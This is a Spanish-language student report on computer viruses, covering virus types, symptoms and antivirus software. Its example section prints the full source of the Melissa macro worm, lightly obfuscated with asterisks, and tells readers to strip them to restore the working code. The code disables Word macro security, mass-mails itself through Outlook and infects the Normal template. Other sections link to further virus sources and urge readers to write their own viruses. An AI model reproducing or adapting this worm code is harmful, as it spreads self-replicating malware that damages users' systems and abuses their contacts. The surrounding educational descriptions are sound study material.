10 Anexos

Aquí os voy a mostrar enlaces para unos de los virus más conocidos, entre otras cosas, no puedo copiar el código fuente del virus en un documento .pdf, ni siquiera descargarlo porque el antivirus me salta nada mas clicar el botón descargar, no me deja ni siquiera clicar en guardar o cancelar en la ventana del gestor de descargas. Como apunte, aquí podemos ver el uso de los antivirus y su efectividad, en este caso el Nod32.

Código fuente “ILoveYou”

http://www.elhacker.org/index.php?Ver=Articulo&Id=293

Código fuente “HappyTime”

http://www.elhacker.org/index.php?Ver=Articulo&Id=294

Código fuente “Chernobyl”

http://www.elhacker.org/index.php?Ver=Articulo&Id=295

Código fuente “Anna Kournikova”

http://www.elhacker.org/index.php?Ver=Articulo&Id=296

Tened cuidado al descargar los archivos, vienen en formato .txt pero no se os ocurra transformarlo a exe ni probarlos ya que puede que no todos los antivirus los detecten.

9 Bibliografia

Enciclopedia Larousse.

“Los piratas del chip” de Clouhg y Mungo

“El arte de la búsqueda y defensa de Virus” por Peter Szor

“Virus Informáticos para principiantes” de Peter H. Gregory

“Contagios Digitales: La Arqueología de los Virus” por Jussi Parikka

Libros encontrados en http://amazon.co.uk

8 Recursos de Internet

http://es.wikipedia.org

http://www.cafeonline.com

http://www.monografias.com

http://elhacker.org

7 Conclusiones

En mi opinión el mundo de los antivirus es bastante interesante e inquietante a la vez, pero es tan interesante como peligroso. El ser humano tiene muchos defectos, y cuando te picas con un tema siempre tiendes a intentar conseguir algo mas, es decir, “a ver que puedo conseguir si hago esto…, si hago lo otro”. Esto aplicado a los virus solo lleva a una cosa: Problemas.

Y es pues, este tema es muy interesante si no sale de tu casa, pero no es controlable, como podemos ver el caso de David H. con su virus “Melissa”, que se le fue de las manos por completo. Puedes intentar gastar una broma a unos compañeros de clase, y acabar enrejado a los meses con una multa bastante apetitosa.

Mentes muy celebres han conseguido trabajos en las mejores empresas, simplemente intentando atacarlas y consiguiendo su propósito pero no todas las personas corren la misma suerte. Así como muchos hackers han acabado trabajando para la protección de empresas, otros hackers han terminado en prisión, y estos son la mayoría.

Asique, recomiendo trastear un poco con estos juguetes para mayores de 18 y utilizar como banco de pruebas un ordenador de casa sin conexión a internet y lejos del alcance de los niños. Así podemos ver de lo que es capaz un virus, como se comporta, crear los nuestros propios porque, esto no deja de ser una manera de mejorar nuestros conocimientos informáticos, tanto de programación, como de protección contra los virus.

6.1 Sintomas de los Virus

¿Cuáles son los síntomas más comunes cuando tenemos un virus?

Reducción del espacio libre en la memoria o disco duro.

Un virus, cuando entra en un ordenador, debe situarse obligatoriamente en la memoria RAM , y por ello ocupa una porción de ella. Por tanto, el tamaño útil operativo de la memoria se reduce en la misma cuantía que tiene el código del virus.

• Aparición de mensajes de error no comunes.
• Fallos en la ejecución de  programas.
• Frecuentes caídas del sistema
• Tiempos de carga mayores.
• Las operaciones rutinarias se realizan con mas lentitud.
• Aparición de programas residentes en memoria desconocidos.
• Actividad y comportamientos inusuales de la pantalla.

Muchos de los virus eligen el monitor para notificar al usuario su presencia en el ordenador. Cualquier desajuste de la pantalla, o de los caracteres de esta nos puede notificar la presencia de un virus.

El disco duro aparece con sectores en mal estado

Algunos virus usan sectores del disco para camuflarse, lo que hace que aparezcan como dañados o inoperativos.

Cambios en las características de los ficheros ejecutables

Casi todos los virus, aumentan el tamaño de un fichero ejecutable cuando lo infectan. También puede pasar, si el virus no ha sido programado por un experto, que cambien la fecha del fichero a la fecha de infección.

Aparición de anomalías en el teclado

Existen algunos virus que definen ciertas teclas que al ser pulsadas, realizan acciones perniciosas en el ordenador. También suele ser común el cambio de la configuración de las teclas, por la del país donde se programo el virus.

6 Como Combatirlos

Dice el refrán que en esta vida todo tiene solución menos la muerte, y con los virus no va a ser lo contrario. Existen muchas formas de combatir un virus, como no entrar en sitios sospechosos, no aceptar nada de desconocidos, no abrir archivos con extensiones que no vienen a cuento (un caso muy común es una imagen.jpg.exe) por eso para esto último es bueno tener siempre activado “ver la extensión de los archivos”, y un sinfín de consejos contra los virus.

Luego, por otro lado, tenemos otro tipo de consejos, más bien dicho son una especie de “guardias” que velan por nuestra seguridad mientras estos virus están rondando por ahí intentando adentrarse en nuestro ordenador. Sí, estoy hablando de los Anti-Virus.

Un Anti-Virus es básicamente un software encargado de defendernos de los virus, como el propio nombre lo dice, sus ataques y todo lo relacionado con estos. Hay unos más efectivos que otros, cada uno elige el que más le gusta o con el que mejor experiencia ha tenido/han tenido sus conocidos, etc. En mi caso, han pasado por mis manos el McAffee, el Panda, el Norton, el Karspersky, el Avast, el AVG y por último el Nod32 de los cuales me quedo con este último ya que es el único que consume muy muy pocos recursos, no da ningún problema con mi SO (Windows 7 Professional 64 bits) y actualiza cada poco tiempo, haciendo scans casi a diario y sin yo notarlo, y no lo noto tanto en este QuadCore que actualmente manejo ni en el Pentium 4 Presscot que hasta hace un año tuve.

Dejando de lado las opiniones personales sobre antivirus, voy a contaros un poco de historia sobre los antivirus y su nacimiento, desarrollo, etc.

Los antivirus nacieron como una herramienta simple cuyo objetivo fuera detectar y eliminar virus informáticos, durante los años 80.

Con el transcurso del tiempo, la aparición de sistemas operativos más avanzados e Internet, los antivirus han evolucionado hacia programas más avanzados que no sólo buscan detectar un Virus informáticos, sino bloquearlo, desinfectar y prevenir una infección de los mismos, así como actualmente ya son capaces de reconocer otros tipos de malware, como spyware, rootkits, etc.

El funcionamiento de un antivirus varía de uno a otro, aunque su comportamiento normal se basa en contar con una lista de virus conocidos y su formas de reconocerlos (las llamadas firmas o vacunas), y analizar contra esa lista los archivos almacenados o transmitidos desde y hacia un ordenador.

Adicionalmente, muchos de los antivirus actuales han incorporado funciones de detección proactiva, que no se basan en una lista de malware conocido, sino que analizan el comportamiento de los archivos o comunicaciones para detectar cuáles son potencialmente dañinas para el ordenador. En este caso también suelen detectar algunos programas como dañinos aunque no lo sean, algunos modificadores del registro de Windows, programas generadores de claves de CD (Key-Gens), etc.

Estas bases de firmas, mencionadas anteriormente, recogen unos códigos maliciosos asignados a cada tipo de virus, los cuales serán comparados con todo archivo que entre en nuestro ordenador y si se diera el caso de que coincide con algo, lo detecta como virus y lo bloquea, en el caso del nod32, muestra en pantalla la información y elimina el archivo directamente. Todos los antivirus actuales poseen la detección proactiva, que sumada a la base de firmas hace que la protección sea exitosa.

Tener el antivirus actualizado es casi tan obligatorio como respirar, pero no nos garantiza que seamos protegidos de todos los virus que hay, ya que continuamente se están modificando o construyendo nuevos.

Aun así, como yo digo siempre, el mejor antivirus es el sentido común. Si a este le añades un plus de software no debería ocurrir nada.

5.1 Ejemplo de Virus

Hay muchos virus importantes que han pasado a la historia de la informática, como son el ILoveYou, el Blaster, famoso este ultimo por provocar que el ordenador se apagase en 60 segundos sin poder hacer nada, muy extendido en los años 2002-2004 y por último, el virus Melissa, que es el que os mostrare a continuación.

Fue lanzado en 1999 por un estadounidense llamado David L. Smith, sin ningún ánimo de lucro, el virus originalmente tomaba el nombre de Mailissa (por su propagación vía email), Kwyjibo, Eran varios de sus nombres. Básicamente lo que hacía era atacar el tratamiento de texto de Microsoft “Microsoft Word 97” y “2003”, mostraba mensajes en pantalla con el Word y destruía su contenido, propagándose a su vez por email. Al chaval se le fue de las manos y llego a innumerables países causando la detención de David y su prisión.

Aquí os voy a mostrar el código fuente del famoso virus “Melissa”, puede que el antivirus salte con que es dañino aunque intentare repasar el código con “*”, por lo que deberíamos eliminar los “*” y obtendríamos el código original:

Private Sub Document_Open()
On Error Resume Next
If System.**PrivateProfileString(«»,
«HKEY_CURRENT**_USER\Software\Microsoft\Office\9.0\Word\Security», «Level») <> «»

**Aqui vemos como ataca a los registros de Windows para volver vulnerable al Microsoft Office**
Then
CommandBars(«Macro»).Controls(«Security…»).Enabled = False
System.PrivateProfileString(«»,
«HKEY_CURRENT**_USER\Software\Microsoft\Office\9.0\Word\Security», «Level») = 1&
Else

CommandBars(«Tools»).*Controls(«Macro»).Enabled = False
Options.ConfirmConversions = (1 – 1): Options.VirusProtection = (1 – 1):
Options.Save*NormalPrompt = (1 – 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(«Outlook.Application»)
Set DasMapiName = UngaDasOutlook.GetNameSpace(«MAPI»)
If System.Private*ProfileString(«»,
«HKEY_CURRENT_USER\Software\Microsoft\Office\», «Melissa?») <> «… by Kwyjibo»
**Vuelve a atacar los registros, originando un mensage**

Then
If UngaDasOutlook = «Outlook» Then
DasMapiName.Logon «profile», «password»
For y = 1 To DasMapiName.AddressLists.Count
Set Addy*Book = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
Break*UmOffASlice.Subject = «Important Message From » &
Application.UserName
BreakUmOffASlice.Body = «Here is that document you asked for … don’t
show anyone else ;-)»
BreakUmOffASlice.Attachments.Add Activedocument.FullName
BreakUmOffASlice.Send
Peep = «»
Next y
DasMapiName.*Logoff
End If
System.PrivateProfileString(«», «HKEY_CURRENT_USER\Software\Microsoft\Office\»,
«Melissa?») = «… by Kwyjibo»
End If
Set ADI1 = Activedocument.*VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.*VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> «Melissa» Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = «Melissa»
DoAD = True
End If
If NTI1.Name <> «Melissa» Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = «Melissa»
DoNT = True
End If
If DoNT* <> True And DoAD <> True Then GoTo CYA
If DoNT* = True Then
Do While ADI1.CodeModule.Lines(1, 1) = «»
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString («Private Sub Document_Close()»)
Do While ADI1.CodeModule.Lines(BGN, 1) <> «»
ToInfect.Code*Module.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = «»
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.Code*Module.AddFromString («Private Sub Document_Open()»)
Do While NTI1.CodeModule.Lines(BGN, 1) <> «»
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, Activedocument.Name, «Document») =
False) Then
Activedocument.SaveAs FileName:=Activedocument.FullName
ElseIf (InStr(1, Activedocument.Name, «Document») <> False) Then
Activedocument.Saved = True: End If
‘WORD/Melissa written by Kwyjibo
‘Works in both Word 2000 and Word 97
‘Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
‘Word -> Email | Word 97 <–> Word 2000 … it’s a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText » Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters.  Game’s over.
I’m outta here.»
End Sub

Como vemos en este ejemplo, el virus trata de atacar al sistema operativo por el registro, intentando colarse por algún Bug o hueco como este caso es la seguridad del Word, que la cambia a “False”, un valor utilizado en Visual Basic para desactivar y así conseguir entrar y ejecutarse completamente con su mensaje mostrado en pantalla.

Programacion de un virus

Escribir virus puede ser una motivación especial para aprender a programar: batch, visual basic, C, ensamblador… Muchos empiezan estudiando a fondo códigos de virus sencillos, como yo por ejemplo que para aprender a jugar a un juego veo repeticiones o videos del mismo, en StarCraft por ejemplo. Es habitual que buenos virus generen muchas variantes y copias de métodos exitosos de infección o de ocultación.

Es algo realista empezar a estudiar un virus infector de ficheros COM y luego EXE, y no hacerlo por uno con polimorfismo o multiproceso. En ese sentido, los libros de Mark Ludwig son un buen comienzo.

Cuando un programador quiere realizar un programa para gestionar correo, chatear o lo que sea en Windows, debe usar los recursos (APIs, librerías, etc.) que utiliza este sistema operativo. Un creador de virus busca controlar los accesos normales para enviar correos, desactivar el monitor del antivirus, etc., por lo que requiere conocimientos importantes del funcionamiento del ordenador, del sistema operativo y del software, mayores si programa en ensamblador y menores si lo hace en lenguajes interpretados (macros, scripts, etc).

Según he leído en internet la mejor opciones comenzar con Batch. Aunque si ya tienes experiencia, puedes pasar directamente a visual basic y a ensamblador. El verdadero escritor de virus tiene que conocer ensamblador, pero muchas veces ocurre como con Linux, que los novatos van diciendo a diestro y siniestro que hablan en ensamblador y tienen sueños compilando el kernel sin ayuda, básicamente no hay que fardar de lo que uno no puede hacer. Los virus y gusanos se pueden escribir en el lenguaje apropiado pero el ensamblador es para un coderz como linux para un hacker.

Tipos de virus, malware en general

Los virus se clasifican por el modo en que actúan infectando el ordenador:

• Programa: Infectan archivos ejecutables tales como .com / .exe / .ovl / .drv / .sys / .bin
• Boot: Infectan los sectores Boot Record, Master Boot, FAT y la Tabla de Partición.
• Múltiples: Infectan programas y sectores de «booteo».
• BIOS: Atacan al BIOS para desde allí reescribir los discos duros.
• Hoax: Se distribuyen por e-mail y la única forma de eliminarlos es el uso del sentido común, es decir, no abriendo el email. Generalmente los correos de hoy en día los detectan como dañinos.

Los virus mas comunes son los de programa y sobretodo los .exe, ya que son los mas directos y fáciles de programar,  refiriéndome a que con un simple editor de C y un poco de mala intención se puede conseguir algo básico.

Ahora, veremos cada tipo de virus detalladamente, sabemos como se propagan, que son, que hacen y como infectan.

4.1 Troyanos

Es un programa dañino que se oculta en otro programa legítimo, y que produce sus efectos perniciosos al ejecutarse este último. En este caso, no es capaz de infectar otros archivos o soportes, y sólo se ejecuta una vez, aunque es suficiente, en la mayoría de las ocasiones, para causar su efecto destructivo.

Los troyanos, como norma general tienen como objetivo sacar información del ordenador del afectado, información tal como contraseñas, números de cuenta, etc. Básicamente todo lo que se teclea y se introduce en el ordenador por teclado.

Ejemplos: Back Orifice o BO, SubSeven, Netbus, Assasin.

4.2 Gusano o Worm

Es un programa cuya única finalidad es la de ir consumiendo la memoria del sistema, se copia así mismo sucesivamente, hasta que desborda la RAM, siendo ésta su única acción maligna. Esto significa que se hace copias de si mismo y no se añade a ningún fichero ejecutable, pero se envía a través de una red.

Como ejemplos tenemos: Morris, Melissa, ILoveYou…

4.3 Virus de macros

Un macro es una secuencia de órdenes de teclado y mouse asignadas a una sola tecla, símbolo o comando. Son muy útiles cuando este grupo de instrucciones se necesitan repetidamente. Los virus de macros afectan a archivos y plantillas que los contienen, haciéndose pasar por una macro y actuaran hasta que el archivo se abra o utilice.

Los virus macro son, sin embargo, aplicaciones específicas. Infectan las utilidades macro que acompañan ciertas aplicaciones como el Microsoft Word y Excel, lo que significa que un Word virus macro puede infectar un documento Excel y viceversa. Además, los virus macro viajan entre archivos en las aplicaciones y pueden, eventualmente, infectar miles de archivos.

Los virus macro se escriben en Visual Basic y son muy fáciles de crear. Pueden infectar diferentes puntos de un archivo en uso, por ejemplo, cuando éste se abre, se graba, se cierra o se borra. Lo primero que hacen es modificar la plantilla maestra (normal.dot) para ejecutar varias macros insertadas por el virus, así cada documento que abramos o creemos, se incluirán las macros «víricas».

De acuerdo con la Internacional Security Association, los virus macro forman el 80% de todos los virus y son los que más rápidamente han crecido en toda la historia de los ordenadores en los últimos 5 años. A diferencia de otros tipos de virus, los virus macro no son exclusivos de ningún sistema operativo y se diseminan fácilmente a través de archivos adjuntos de e-mail, disquetes, bajadas de Internet, transferencia de archivos y aplicaciones compartidas.

4.4 Virus de sobreescritura

Sobrescriben en el interior de los archivos atacados, haciendo que se pierda el contenido de los mismos.

Un claro ejemplo de este virus se da en el momento de que aparece el archivo como “corrupto” cuando previamente ya lo habíamos utilizado. No siempre que recibimos está notificación debe de tratarse de un virus, pero muchas veces lo es ya que destruye, como hemos dicho, el contenido original del archivo.

4.5 Virus mutantes

Son virus que mutan, es decir cambian ciertas partes de su código fuente haciendo uso de procesos de encriptación y de la misma tecnología que utilizan los antivirus. Debido a estas mutaciones, cada generación de virus es diferente a la versión anterior, dificultando así su detección y eliminación.

4.6 Virus múltiples

Son virus que infectan archivos ejecutables y sectores de booteo simultáneamente, combinando en ellos la acción de los virus de programa y de los virus de sector de arranque.

3 El modelo de virus en general

¿Virus? ¿Qué es un virus? Un virus, como ya hemos dicho antes, es un tipo de “software” llamado malware que tiene como objetivo alterar el correcto funcionamiento del ordenador. Siendo un pequeño programa escrito intencionalmente para instalarse el ordenador de un usuario sin el conocimiento o el permiso de este. Por lo que el virus tiene 3 características principales: es dañino, se reproduce solo o “copia” y es subrepticio. Como ya hemos dicho, el usuario desconoce de la existencia de este software en su ordenador por lo que debe ser silencioso y reproducirse sin que se dé cuenta para más adelante atacar o, simplemente propagarse ya que hay virus que solo se propagan y no atacan.

La estructura de un virus se divide en 3 fases, fáciles de comprender y necesarias para su correcto funcionamiento, como el de cualquier programa:

• Mecanismo de reproducción. Infección que genera copias del virus “pegadas” en ficheros ejecutables o en el sector de arranque de discos (en realidad son programas también).

• Detonante (trigger). Esta parte del virus (de su código) se encarga de comprobar si se cumplen las situaciones previstas por el programador. Cuando se cumplan una o varias circunstacias: puede ser una fecha concreta, una acción por parte del usuario, etc.

• Carga (payload). La acción que realiza el virus. No tiene por qué ser destructivo: puede ser mostrar una ventana, un mensaje, etc. Entre los payload destructivos o perjudiciales pueden encontrarse desde el borrado de ficheros hasta el envío de información confidencial a destinos no autorizados.

Existen ciertas analogías entre los virus biológicos y los informáticos: mientras los primeros son agentes externos que invaden células para alterar su información genética y reproducirse, los segundos son programas-rutinas, en un sentido más estricto, capaces de infectar archivos de ordenadores, reproduciéndose una y otra vez cuando se accede a dichos archivos, dañando la información existente en la memoria o alguno de los dispositivos de almacenamiento del ordenador.

Tienen diferentes finalidades: Algunos sólo ‘infectan’, otros alteran datos, otros los eliminan, algunos sólo muestran mensajes. Pero el fin último de todos ellos es el mismo: PROPAGARSE.

La propagación de un virus es muy sencilla. Al recibir un archivo infectado, el virus se alberga en el código fuente de dicho archivo que al ejecutarlo pasa a ser residido en la RAM, el virus se copia en la RAM para después infectar todo lo que este siendo ejecutado en el momento. Así consigue infectar archivos tan esenciales como el explorer.exe, svchost.exe, librerías, etc.